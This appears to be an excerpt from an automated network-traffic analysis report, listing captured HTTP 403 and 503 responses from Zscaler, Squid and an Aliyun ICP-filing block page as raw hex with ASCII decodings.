Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:47 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 